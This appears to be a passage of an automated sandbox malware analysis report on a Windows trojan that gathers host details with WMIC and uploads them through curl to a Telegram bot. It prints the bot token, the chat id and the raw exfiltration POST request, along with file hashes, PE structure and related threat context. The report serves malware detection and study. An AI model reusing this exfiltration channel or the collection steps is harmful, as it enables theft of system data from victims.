        https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentC:curl.exe, 0000002D.00000002.2465503271.0000025DD64C0000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentLCcurl.exe, 0000002D.00000002.2465599836.0000025DD64DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2464866626.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465157934.0000025DD64DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2464902792.0000025DD64DE000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4o.txt1q9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://api.telegram.org/bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocumentapi.telegram.curl.exe, 0000002D.00000003.2464866626.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465008395.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002D.00000003.2465157934.0000025DD64DD000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://api.telegram.org/botctK.exe9KEZfGRjyK.exe, 00000000.00000002.2465951208.0000021FE02CB000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://docs.rs/getrandom#nodejs-es-module-support9KEZfGRjyK.exefalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      149.154.167.220
                      		api.telegram.orgUnited Kingdom
                      		62041TELEGRAMRUfalse

                      Private

                      IP
                      127.0.0.1

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1578571
                      Start date and time:2024-12-19 22:43:06 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 26s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:49
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:9KEZfGRjyK.exe
                      renamed because original name is a hash value
                      Original Sample Name:73b0e64dcc0df2f2ac4d461245021e6a.exe
                      Detection:MAL
                      Classification:mal72.troj.evad.winEXE@64/2@1/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 17
                      • Number of non-executed functions: 55
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: 9KEZfGRjyK.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:43:58API Interceptor8x Sleep call for process: WMIC.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      149.154.167.220file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                        PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                          PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                            66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                  D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                    Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                        chrome11.exeGet hashmaliciousUnknownBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          api.telegram.orgPURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                          • 149.154.167.220
                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                          • 149.154.167.220
                                          Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          chrome11.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          chrome11.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRUfile.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                          • 149.154.167.99
                                          PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                          • 149.154.167.220
                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                          • 149.154.167.220

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          74954a0c86284d0d6e1c4efefe92b521Hkeyboard.dllGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          67618a47ee8c5.vbsGet hashmaliciousMint StealerBrowse
                                          • 149.154.167.220
                                          PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.htaGet hashmaliciousMint StealerBrowse
                                          • 149.154.167.220
                                          webhook.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          loader.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          loader.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          chos.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                          • 149.154.167.220
                                          Document.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\Desktop\system_info.txt

                                          Download File
                                          Process:C:\Users\user\Desktop\9KEZfGRjyK.exe
                                          File Type:ASCII text, with CRLF, CR, LF line terminators
                                          Category:dropped
                                          Size (bytes):3358
                                          Entropy (8bit):4.789579967493789
                                          Encrypted:false
                                          SSDEEP:96:z5DMzjuDyC2+qS8wSkKdQe82+Uq1OcCXL:9DqC2+qSPSkKJ82tLXL
                                          MD5:CD0F502444307F4021FE0A2F8D203787
                                          SHA1:8902442774AE4A231AA92A89E962C812A80AFA24
                                          SHA-256:E9960F02B7753EFCD72E7AC77E1C6E2AD7673291BA77CB53400C439C0DC820E1
                                          SHA-512:A1D7AABF0003F48BCB35B5CF6C90681C776ECB70AC763E15547D952050735F4EFFA52876D710F1F56C591F47C9B278A413D659AD43E39336537389EAE251A863
                                          Malicious:false
                                          Preview:Computer Name: user-PC.User Name: user.BIOS Serial Number: SerialNumber ...8Z7GLAHHRT.Motherboard Serial Number: SerialNumber ...4895672044416658.CPU Info: Name ...Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz ...Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.Total RAM: TotalPhysicalMemory ...4293971968.Disk Info: Model Size ...ANZ1RF5L SCSI Disk Device 412300001200.Antivirus: displayName ...Windows Defender.MAC Address: Physical Address Transport Name ..=================== ==========================================================..EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}.System Info: Host Name: user-PC..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.19045 N/A Build 19045..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type:

                                          \Device\Null

                                          Download File
                                          Process:C:\Windows\System32\curl.exe
                                          File Type:ASCII text, with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):557
                                          Entropy (8bit):3.10752934803616
                                          Encrypted:false
                                          SSDEEP:6:I2swj2SAykymUeC3/8UniegCSgOgcdSgOgcdivIdcFFmVvT02FcaVlx:Vz6ykymUePbnc9cL9cddcFFir02FNHx
                                          MD5:7275061B2B7E13CB9F3A95E0A4E7811E
                                          SHA1:0136EB08108C1E19B647CCF7988A23E0018DF5E4
                                          SHA-256:6557EE4847B998344908C9F37FA02A2760A2366EF3473D0865CEB914E23D0B8A
                                          SHA-512:2A8591FEC4837B451BC8561A8BFA82E5628C02DAE87237FAC10CE34655C91B5BDCC6FC78316741651BAC5399DE58A86E6F1B1590838565EF6D37458E5B84FFC9
                                          Malicious:false
                                          Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0. 88 4130 0 0 100 3664 0 1434 0:00:02 0:00:02 --:--:-- 1435.100 4130 100 466 100 3664 182 1432 0:00:02 0:00:02 --:--:-- 1615..

                                          Static File Info

                                          General

                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Entropy (8bit):6.301112846910871
                                          TrID:
                                          • Win64 Executable GUI (202006/5) 92.65%
                                          • Win64 Executable (generic) (12005/4) 5.51%
                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                          • DOS Executable Generic (2002/1) 0.92%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:9KEZfGRjyK.exe
                                          File size:378'880 bytes
                                          MD5:73b0e64dcc0df2f2ac4d461245021e6a
                                          SHA1:ff75ef00e33fb953964d6bbe1d86d5ad8bb8c9ba
                                          SHA256:99a4d0ac34848d665529220a0a04edd2753aba9ffe8434286967875d05643400
                                          SHA512:e6921dcba48d193bd592d316613a3fffc7bdf03868ff07dd2553cc32bbf2318dc54f777a90ecb2c2782471567f7657f9185f65814e43e7c0f5d820593ccbcf99
                                          SSDEEP:6144:lE3fAFcnP6AAHOZ7Uh2EaGQGGapOdTFTh8kJM1VZn:lE34FgAEGQGGTx+WM1
                                          TLSH:B9845B25FE565DACD58BC0B482128A726932B8CE0B31B9FF12D442353E69AF16F3C754
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H7...V`..V`..V`......V`...c..V`...d..V`...e.$V`.G.a..V`..Va..V`..V`.6V`......V`...b..V`.Rich.V`.........PE..d.....dg.........."

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x140038d60
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x140000000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x67648104 [Thu Dec 19 20:24:36 2024 UTC]
                                          TLS Callbacks:0x4002a890, 0x1
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:0
                                          File Version Major:6
                                          File Version Minor:0
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:0
                                          Import Hash:df132870cc8376ee210867916013d887

                                          Entrypoint Preview

                                          Instruction
                                          dec eax
                                          sub esp, 28h
                                          call 00007F7AF4FB0908h
                                          dec eax
                                          add esp, 28h
                                          jmp 00007F7AF4FB0497h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          nop word ptr [eax+eax+00000000h]
                                          dec eax
                                          sub esp, 10h
                                          dec esp
                                          mov dword ptr [esp], edx
                                          dec esp
                                          mov dword ptr [esp+08h], ebx
                                          dec ebp
                                          xor ebx, ebx
                                          dec esp
                                          lea edx, dword ptr [esp+18h]
                                          dec esp
                                          sub edx, eax
                                          dec ebp
                                          cmovb edx, ebx
                                          dec esp
                                          mov ebx, dword ptr [00000010h]
                                          dec ebp
                                          cmp edx, ebx
                                          jnc 00007F7AF4FB0638h
                                          inc cx
                                          and edx, 8D4DF000h
                                          wait
                                          add al, dh

                                          Rich Headers

                                          Programming Language:
                                          • [IMP] VS2008 SP1 build 30729

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x582bc0x104.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x1f8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5b0000x2a9c.pdata
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000x668.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x50ff00x54.rdata
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x512000x28.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x50eb00x140.rdata
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x400000x458.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x3ed700x3ee00b18ef078dbb571020d954c6b115eb34cFalse0.4967344371272366data6.355785043053073IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x400000x192fa0x19400a57eadc0bc392731421b1ee050a6b056False0.38722153465346537data5.407331463120315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x5a0000xac00x200cdb4f452a9c373c6ece62e34b50b2fbeFalse0.28515625data2.4546151187241256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .pdata0x5b0000x2a9c0x2c00a18a17c2855b033d9d8056b0eb1b3c8cFalse0.4833984375data5.455692511911118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .padding0x5e0000x8a40xa007b7f26e348909ab91cf74011db8d3a94False0.891015625data7.3761949714995865IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x5f0000x1f80x200f63d27195363577233775bb9fd0e9a51False0.484375data2.830251446092126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x600000x6680x800e005ebc65f734c9ef812873e4dc54879False0.5458984375data4.849281107799458IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x5f0600x198OpenPGP Public KeyEnglishUnited States0.5122549019607843

                                          Imports

                                          DLLImport
                                          api-ms-win-core-synch-l1-2-0.dllWakeByAddressAll, WakeByAddressSingle, WaitOnAddress
                                          bcryptprimitives.dllProcessPrng
                                          bcrypt.dllBCryptGenRandom
                                          ADVAPI32.dllSystemFunction036
                                          kernel32.dllEncodePointer, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetStdHandle, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCurrentThreadId, WriteFileEx, SleepEx, GetExitCodeProcess, TerminateProcess, GetSystemTimePreciseAsFileTime, SetWaitableTimer, HeapReAlloc, lstrlenW, ReleaseMutex, FindClose, CreateWaitableTimerExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetCurrentThread, FindFirstFileW, ReadFile, GetOverlappedResult, CancelIo, GetCurrentProcess, SetThreadStackGuarantee, GetConsoleMode, SetFileInformationByHandle, GetModuleHandleW, GetModuleFileNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetFullPathNameW, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, CreateThread, GetModuleHandleA, AddVectoredExceptionHandler, GetEnvironmentVariableW, GetEnvironmentStringsW, CompareStringOrdinal, GetCurrentDirectoryW, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, DeleteProcThreadAttributeList, FreeEnvironmentStringsW, GetTimeZoneInformationForYear, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, FormatMessageW, SetLastError, RtlVirtualUnwind, TlsAlloc, WaitForSingleObject, CreateEventW, TlsGetValue, TlsSetValue, GetLastError, TlsFree, HeapAlloc, FreeLibrary, RtlLookupFunctionEntry, GetProcAddress, HeapFree, GetProcessHeap, GetComputerNameExW, CloseHandle, RtlCaptureContext, QueryPerformanceCounter, DuplicateHandle, Sleep, CreateFileW, LoadLibraryExW
                                          ntdll.dllRtlNtStatusToDosError, NtReadFile, NtWriteFile
                                          api-ms-win-crt-string-l1-1-0.dllstrcpy_s, wcsncmp
                                          api-ms-win-crt-runtime-l1-1-0.dllexit, _initterm_e, _initialize_onexit_table, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, __p___argc, _set_app_type, _seh_filter_exe, _crt_atexit, terminate, __p___argv, abort, _cexit, _c_exit, _register_onexit_function, _exit, _register_thread_local_exe_atexit_callback, _initterm
                                          api-ms-win-crt-math-l1-1-0.dll__setusermatherr
                                          api-ms-win-crt-stdio-l1-1-0.dll__p__commode, _set_fmode
                                          api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                          api-ms-win-crt-heap-l1-1-0.dllcalloc, malloc, free, _set_new_mode

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 19, 2024 22:45:13.956825018 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:13.956885099 CET44349775149.154.167.220192.168.2.4
                                          Dec 19, 2024 22:45:13.956979036 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:13.976814985 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:13.976846933 CET44349775149.154.167.220192.168.2.4
                                          Dec 19, 2024 22:45:15.351644039 CET44349775149.154.167.220192.168.2.4
                                          Dec 19, 2024 22:45:15.351911068 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:15.353914976 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:15.353949070 CET44349775149.154.167.220192.168.2.4
                                          Dec 19, 2024 22:45:15.354239941 CET44349775149.154.167.220192.168.2.4
                                          Dec 19, 2024 22:45:15.357839108 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:15.358272076 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:15.358310938 CET44349775149.154.167.220192.168.2.4
                                          Dec 19, 2024 22:45:16.360083103 CET44349775149.154.167.220192.168.2.4
                                          Dec 19, 2024 22:45:16.360304117 CET44349775149.154.167.220192.168.2.4
                                          Dec 19, 2024 22:45:16.360411882 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:16.381330967 CET49775443192.168.2.4149.154.167.220
                                          Dec 19, 2024 22:45:16.381387949 CET44349775149.154.167.220192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 19, 2024 22:45:13.816239119 CET5334453192.168.2.41.1.1.1
                                          Dec 19, 2024 22:45:13.953747034 CET53533441.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 19, 2024 22:45:13.816239119 CET192.168.2.41.1.1.10x4c5cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 19, 2024 22:45:13.953747034 CET1.1.1.1192.168.2.40x4c5cNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • api.telegram.org

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.449775149.154.167.2204435780C:\Windows\System32\curl.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-19 21:45:15 UTC251OUTPOST /bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument HTTP/1.1
                                          Host: api.telegram.org
                                          User-Agent: curl/7.83.1
                                          Accept: */*
                                          Content-Length: 3664
                                          Content-Type: multipart/form-data; boundary=------------------------cdbe2087272a7b9c
                                          2024-12-19 21:45:15 UTC3664OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 64 62 65 32 30 38 37 32 37 32 61 37 62 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 2d 34 31 39 33 37 31 30 32 37 31 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 64 62 65 32 30 38 37 32 37 32 61 37 62 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 35 32 38 31 31 30 2d 34 31 37 34 2d 31 2e 6c 6f 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d
                                          Data Ascii: --------------------------cdbe2087272a7b9cContent-Disposition: form-data; name="chat_id"-4193710271--------------------------cdbe2087272a7b9cContent-Disposition: form-data; name="document"; filename="528110-4174-1.log"Content-Type: text/plain
                                          2024-12-19 21:45:16 UTC388INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Thu, 19 Dec 2024 21:45:16 GMT
                                          Content-Type: application/json
                                          Content-Length: 466
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          2024-12-19 21:45:16 UTC466INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 30 36 38 33 39 39 30 37 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 56 69 72 74 75 61 6c 62 65 61 6d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 69 72 74 75 61 6c 62 65 61 6d 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 31 39 33 37 31 30 32 37 31 2c 22 74 69 74 6c 65 22 3a 22 50 72 69 76 61 74 65 20 2d 20 73 74 6f 72 61 67 65 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 36 34 34
                                          Data Ascii: {"ok":true,"result":{"message_id":3028,"from":{"id":7068399075,"is_bot":true,"first_name":"Virtualbeam","username":"Virtualbeam_bot"},"chat":{"id":-4193710271,"title":"Private - storage","type":"group","all_members_are_administrators":true},"date":1734644


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:16:43:58
                                          Start date:19/12/2024
                                          Path:C:\Users\user\Desktop\9KEZfGRjyK.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\9KEZfGRjyK.exe"
                                          Imagebase:0x7ff7b9010000
                                          File size:378'880 bytes
                                          MD5 hash:73B0E64DCC0DF2F2AC4D461245021E6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:1
                                          Start time:16:43:58
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                          Wow64 process (32bit):false
                                          Commandline:"wmic" bios get serialnumber
                                          Imagebase:0x7ff61e0e0000
                                          File size:576'000 bytes
                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:16:43:58
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
